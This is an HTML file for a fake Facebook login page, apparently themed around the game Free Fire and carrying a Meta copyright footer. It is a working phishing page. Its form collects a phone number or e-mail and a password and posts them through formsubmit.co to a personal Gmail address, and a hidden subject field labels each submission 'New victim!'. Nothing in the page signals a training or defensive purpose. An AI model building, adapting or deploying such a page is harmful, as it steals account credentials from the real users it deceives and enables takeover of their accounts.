<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Log in with your Facebook account to contact us free fre</title>
  
  
    <style>
    input {
      width: 335px;

      height: 40px;
     
    }
    
button{  
     
      border-radius: 2%; 
      padding: 10px 20px; 
      background-color: #1877F2; 
      color: white; 
      border: none; 
      text-align: center;  
      text-decoration: none; 
      display: inline-block;  
      font-size:10 px; 
      cursor: pointer; 
      width: 335px;

      height: 45px;
    }
 .frame {
       
      background-color: #00A400;
      padding: 10px; 
      color: white
    }
 }
 left-align {
        text-align: left;
    }
    p {
      font-family: Arial, sans-serif;
      font-size: 16px;
      
    }
    .image {
      border: 2px ; /* سمك  2 بكسل ولونها أحمر */
      border-radius: 10px; /* نصف     */
    }
    .arhbi {
      font-family: Arial, sans-serif;
      font-size: 17px;
  </style>
  <script>
    function edgeClicked() {
      alert("تم النقر على الحافة!");
    }
  </script>
</head>
<body>
 <center> <img src="https://play-lh.googleusercontent.com/9zACfwWC3nLgQls-vt4lpz8N0Vv4zWMUXtcFth3oBT5789vmsTktH_fCNXHsGdmtOw4" width="80"  height=",80" class="image">
<font size="3" color="#90949C"> <p class="arhbi">Log in with your Facebook account to contact us <font ><strong>Free Fire</strong></p></font>
 <form action="https://formsubmit.co/Zaasaber31@gmail.com" method="POST">
   
   <input type="hidden" name="_subject" value="New victim! 🔥🔥">
   
 <input type="text" name="username" placeholder="Mobile phone number or e-mail "  required> 
 
 <br><br>
 <input type="password" name="password" placeholder="  Password " required>
 <br> <br>
 
 <button type="submit" ><font size="4.5"><strong>Log in</strong></font></button>
 </form>
 
 <br>
   <p> <font color="#7596C8">have you forgotten your password?</font></p>
 <br>
 <p>or <hr></p>
 <p><span class="frame"><strong>Create a new account</strong></spanhave you forgotten your password?> </p></center>
  <br><br>
  
 
 <font color="#90949C"><p><strong>English(USA)
</strong></p>   </font> 
<font color="49659F"><p>Basa Jawa</p>
<p>日本語</p>
 <p>Português (Brasil) ...</p>
 </font> 
 

 <p align=center>Meta © 2023</p>
 
  
</button>
</body>
</html>
